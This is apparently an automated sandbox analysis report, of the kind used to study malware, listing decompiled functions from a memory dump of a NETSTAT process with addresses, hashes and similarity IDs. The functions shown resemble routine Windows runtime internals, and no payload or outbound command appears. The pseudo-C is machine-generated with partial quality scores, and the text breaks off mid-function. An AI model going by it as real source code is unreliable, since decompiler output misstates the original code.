                0x033d4705
                0x033d4706
                0x033d470c
                0x033d4713
                0x033d471b
                0x033d4723
                0x033d4725
                0x033d46d6
                0x033d46d9
                0x033d46db
                0x033d46db
                0x033d4732

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                • Instruction ID: 554213503875bc15cf3cebd75e91ff9c22b1b3300aa5b90bd026736c8624b3da
                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                • Instruction Fuzzy Hash: DC110276904208BBCB11DF5DE8C08BEB7B9EF85300F1080AAF944CB350DA358D51C3A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033937F5 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E033937F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03372280(_t6, 0x3448550);
				}
				_t29 = E0339387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0336FFB0(0x3448550, _t27, 0x3448550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                0x033937fa
                0x033937fc
                0x03393805
                0x03393808
                0x03393808
                0x03393814
                0x03393818
                0x03393846
                0x03393848
                0x0339384b
                0x0339384b
                0x03393852
                0x00000000
                0x03393854
                0x03393856
                0x00000000
                0x00000000
                0x03393863
                0x00000000
                0x03393863
                0x0339381a
                0x0339381a
                0x0339381f
                0x0339386e
                0x0339386e
                0x03393871
                0x03393873
                0x03393873
                0x03393868
                0x00000000
                0x03393868
                0x03393821
                0x03393826
                0x00000000
                0x00000000
                0x03393828
                0x0339382a
                0x03393841
                0x00000000
                0x03393841

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3485130a8442d8db4ed0804640eeceb635685eda0b00e93e819394e07699e962
                • Instruction ID: 522796d2e2e6d69c2ad7a257c44cd6b6dfdd9f8bcf900a21223d405d7cb2d87d
                • Opcode Fuzzy Hash: 3485130a8442d8db4ed0804640eeceb635685eda0b00e93e819394e07699e962
                • Instruction Fuzzy Hash: 3501C4FA949620DBDB37DB1D9980A26BBEADF85A7271940EBE8458F614D730C805C780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335C962 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                C-Code - Quality: 42%
                			E0335C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x344d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0336EEF0(0x34470a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E033DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0336EB70(_t29, 0x34470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0339B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E033DF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x34470c0; // 0x0
					while(_t38 != 0x34470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x344b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                0x0335c96a
                0x0335c974
                0x0335c988
                0x0335c98a
                0x033c7c9d
                0x033c7c9f
                0x033c7ca4
                0x033c7cae
                0x033c7cf0
                0x033c7cf5
                0x033c7cfa
                0x0335c992
                0x0335c996
                0x0335c997
                0x0335c998
                0x0335c9a3
                0x0335c9a3
                0x033c7cb0
                0x033c7cb7
                0x033c7cbb
                0x00000000
                0x00000000
                0x033c7cbd
                0x033c7ce8
                0x033c7cc5
                0x033c7cc8
                0x033c7cca
                0x033c7cd0
                0x033c7cd6
                0x033c7cde
                0x033c7ce4
                0x033c7ce4
                0x033c7cd0
                0x00000000
                0x033c7ce8
                0x0335c990
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99a764450b60f53d8623eb05636312bc6916c45668c95dd00ded87178093d7ac
                • Instruction ID: 8d8d9f4f872977e2b59bb84e218e5d2275fafe63aeb3d7d288fe19e5b9db1ffb
                • Opcode Fuzzy Hash: 99a764450b60f53d8623eb05636312bc6916c45668c95dd00ded87178093d7ac
                • Instruction Fuzzy Hash: 36110E367207429FCB10EF28DCC4A2ABBE9BB84610B00453DEC529BA51EB20EC01CBC1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338002D Relevance: .1, Instructions: 55COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0338002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03377D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03377D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03377D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03377D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                0x03380032
                0x03380037
                0x03380043
                0x033c4b3a
                0x03380049
                0x03380049
                0x03380049
                0x0338004e
                0x03380053
                0x033c4b48
                0x033c4b5a
                0x033c4b4a
                0x033c4b53
                0x033c4b53
                0x033c4b5f
                0x00000000
                0x033c4b61
                0x00000000
                0x033c4b61
                0x03380059
                0x03380059
                0x03380060
                0x033c4b6f
                0x033c4b6f
                0x03380069
                0x033c4b83
                0x00000000
                0x00000000
                0x033c4b90
                0x033c4b9b
                0x033c4b9b
                0x033c4ba4
                0x00000000
                0x00000000
                0x033c4baa
                0x00000000
                0x0338006f
                0x0338006f
                0x00000000
                0x0338006f
                0x03380069

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                • Instruction ID: e527af2e9f7199979ca0316990c62b31db6fcef4cf3e4fa1290b31f89917e904
                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                • Instruction Fuzzy Hash: 6811CBB2A127C19FD727EB6AC9E4B357798AB40794F0D00E4DD548BAA2E72CDC41C360
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336766D Relevance: .1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E0336766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0338F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0338F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03374620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                0x03367672
                0x0336767f
                0x03367689
                0x033676de
                0x033676de
                0x0336768b
                0x03367691
                0x03367693
                0x03367697
                0x00000000
                0x03367699
                0x033676a8
                0x00000000
                0x033676aa
                0x033676ad
                0x033676b1
                0x00000000
                0x033676b3
                0x033676b3
                0x033676b5
                0x033676ba
                0x033676bc
                0x033676bc
                0x033676c0
                0x00000000
                0x033676c2
                0x033676ce
                0x033676ce
                0x033676c0
                0x033676b1
                0x033676a8
                0x03367697
                0x033676d9

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                • Instruction ID: 77e7da474bda6d2311f456756d9735221af500322f79c1b821202fdce90f4d76
                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                • Instruction Fuzzy Hash: C901D432711218AFC720EE6ECCC0E5BF7ADEB84A60B684124B908DF248DA30DC0183A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033EC450 Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E033EC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03399910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E033995B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E033995D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E033995D0();
				return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                0x033ec458
                0x033ec45d
                0x033ec466
                0x033ec468
                0x033ec469
                0x033ec46a
                0x033ec46b
                0x033ec46e
                0x033ec46f
                0x033ec471
                0x033ec476
                0x033ec476
                0x033ec47c
                0x033ec47e
                0x033ec480
                0x033ec480
                0x033ec483
                0x033ec484
                0x033ec486
                0x033ec488
                0x033ec48f
                0x033ec491
                0x033ec493
                0x033ec493
                0x033ec48f
                0x033ec498
                0x033ec49e
                0x033ec4ad
                0x033ec4ad
                0x033ec4b2
                0x033ec4b4
                0x033ec4cd

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                • Instruction ID: c1ffa3a646369b9933831f69658f203cbd3b001a4749019abf9a357d7a6ee3f2
                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                • Instruction Fuzzy Hash: 3D018076140615FFEB22EF65CCC0EA7F76DFB54391F044529F114465A0CB21ACA1CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03359080 Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E03359080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x34485ec;
				E03372280(_t48, 0x34485ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0336FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x344538c; // 0x77e06888
					if( *_t84 != 0x3445388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x342f6e8);
						E033AD0E8(0x34485ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E034288F5(_t80, _t85, 0x3445388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x34486c0; // 0xb307b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x34486b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03372280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E034288F5(0x34485ec, _t85, 0x3445388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0339AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x344b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x34484c0;
																			if(_t82 >=  *0x34484c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03429063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0335922A(_t99);
										_t64 = E03377D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03428B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x34486c0; // 0xb307b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x34486b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x34486bc;
													_t87 = 0x34486b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03359240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x34486c4;
												_t87 = 0x34486c0;
												L27:
												E03389B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E033AD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3445388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x344538c = _t51;
						goto L6;
					}
				}
			}




















                0x03359082
                0x03359083
                0x03359084
                0x03359085
                0x03359087
                0x03359096
                0x03359098
                0x03359098
                0x0335909e
                0x033590a8
                0x033590e7
                0x033590e7
                0x033590aa
                0x033590b0
                0x033590b7
                0x033590bd
                0x033590dd
                0x033590e6
                0x033590bf
                0x033590bf
                0x033590c7
                0x033590cf
                0x033590f1
                0x033590f2
                0x033590f4
                0x033590f5
                0x033590f6
                0x033590f7
                0x033590f8
                0x033590f9
                0x033590fa
                0x033590fb
                0x033590fc
                0x033590fd
                0x033590fe
                0x033590ff
                0x03359100
                0x03359102
                0x03359107
                0x0335910c
                0x03359110
                0x03359113
                0x03359115
                0x03359136
                0x0335913f
                0x03359143
                0x033b37e4
                0x033b37e4
                0x03359117
                0x03359117
                0x0335911d
                0x00000000
                0x0335911f
                0x0335911f
                0x03359125
                0x00000000
                0x03359127
                0x0335912d
                0x03359130
                0x03359134
                0x03359158
                0x0335915d
                0x03359161
                0x03359168
                0x033b3715
                0x0335916e
                0x0335916e
                0x03359175
                0x03359177
                0x0335917e
                0x0335917f
                0x03359182
                0x03359182
                0x03359187
                0x03359187
                0x0335918a
                0x0335918d
                0x0335918f
                0x03359192
                0x03359195
                0x03359198
                0x03359198
                0x03359198
                0x0335919a
                0x00000000
                0x00000000
                0x033b371f
                0x033b3721
                0x033b3727
                0x033b372f
                0x033b3733
                0x033b3735
                0x033b3738
                0x033b373b
                0x033b373d
                0x033b3740
                0x00000000
                0x033b3746
                0x033b3746
                0x033b3749
                0x00000000
                0x033b374f
                0x033b374f
                0x033b3751
                0x033b3757
                0x033b3759
                0x033b375c
                0x033b375c
                0x033b375e
                0x033b375e
                0x033b3761
                0x033b3764
                0x00000000
                0x00000000
                0x033b3766
                0x033b3768
                0x033b37a3
                0x033b37a3
                0x033b37a5
                0x033b37a7
                0x033b37ad
                0x033b37b0
                0x033b37b2
                0x033b37bc
                0x033b37c2
                0x033b37c2
                0x033b37b2
                0x03359187
                0x03359187
                0x0335918a
                0x0335918d
                0x0335918f
                0x03359192
                0x03359195
                0x00000000
                0x03359195
                0x00000000
                0x033b376a
                0x033b376a
                0x033b376a
                0x033b376c
                0x033b376c
                0x033b376f
                0x033b3775
                0x00000000
                0x00000000
                0x033b3777
                0x033b3779
                0x033b3782
                0x033b3787
                0x033b3789
                0x033b3790
                0x033b3790
                0x033b378b
                0x033b378b
                0x033b378b
                0x033b3792
                0x033b3795
                0x00000000
                0x033b3795
                0x00000000
                0x033b3779
                0x033b3798
                0x00000000
                0x033b3798
                0x00000000
                0x033b3768
                0x033b379b
                0x033b379b
                0x033b3751
                0x033b3749
                0x00000000
                0x033b3740
                0x033591a0
                0x033591a3
                0x033591a9
                0x033591b0
                0x00000000
                0x033591b0
                0x03359187
                0x033591b4
                0x033591b4
                0x033591bb
                0x033591c0
                0x033591c5
                0x033591c7
                0x033b37da
                0x033591cd
                0x033591cd
                0x033591cd
                0x033591d2
                0x033591d5
                0x03359239
                0x03359239
                0x033591d7
                0x033591db
                0x033591e1
                0x033591e7
                0x033591fd
                0x03359203
                0x0335921e
                0x03359223
                0x00000000
                0x03359205
                0x03359205
                0x03359208
                0x0335920c
                0x03359214
                0x03359214
                0x0335920c
                0x033591e9
                0x033591e9
                0x033591ee
                0x033591f3
                0x033591f3
                0x033591f3
                0x033591e7
                0x00000000
                0x00000000
                0x00000000
                0x03359134
                0x03359125
                0x0335911d
                0x0335914e
                0x033590d1
                0x033590d1
                0x033590d3
                0x033590d6
                0x033590d8
                0x00000000
                0x033590d8
                0x033590cf

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 397fb841f9dad6bce8ae8a134b0215e80c93b47f69545664524b2237d06240cb
                • Instruction ID: 891ed9a4f1073fac2d9676423caaf699a4135b6edf841e79b14c755b148f4394
                • Opcode Fuzzy Hash: 397fb841f9dad6bce8ae8a134b0215e80c93b47f69545664524b2237d06240cb
                • Instruction Fuzzy Hash: 350169B2A01604CFD725DB18DC80B22BBF9EB86721F2944A6E905DF691D379DC41CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03424015 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E03424015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03372280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03372280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x34486ac);
					E0335F900(0x34486d4, _t28);
					E0336FFB0(0x34486ac, _t28, 0x34486ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0336FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                0x0342401a
                0x0342401e
                0x03424023
                0x03424028
                0x03424029
                0x0342402b
                0x0342402f
                0x03424043
                0x03424046
                0x03424051
                0x03424057
                0x0342405f
                0x03424062
                0x03424067
                0x0342406f
                0x0342407c
                0x0342407c
                0x0342408c
                0x0342408c
                0x03424097

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff922297e85717c392dedbca15e3566033849e39b95af9b92ae74bf83ee27c67
                • Instruction ID: 4907d87c3a096ac93474587315f16ceff1fd32d63870ca7ef0cc5b1ed998bf70
                • Opcode Fuzzy Hash: ff922297e85717c392dedbca15e3566033849e39b95af9b92ae74bf83ee27c67
                • Instruction Fuzzy Hash: E001A775601A49BFD261EB79CDC0E67B7ACFF45660B000226F508CFA11DB24EC52C6E4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0341138A Relevance: .0, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E0341138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
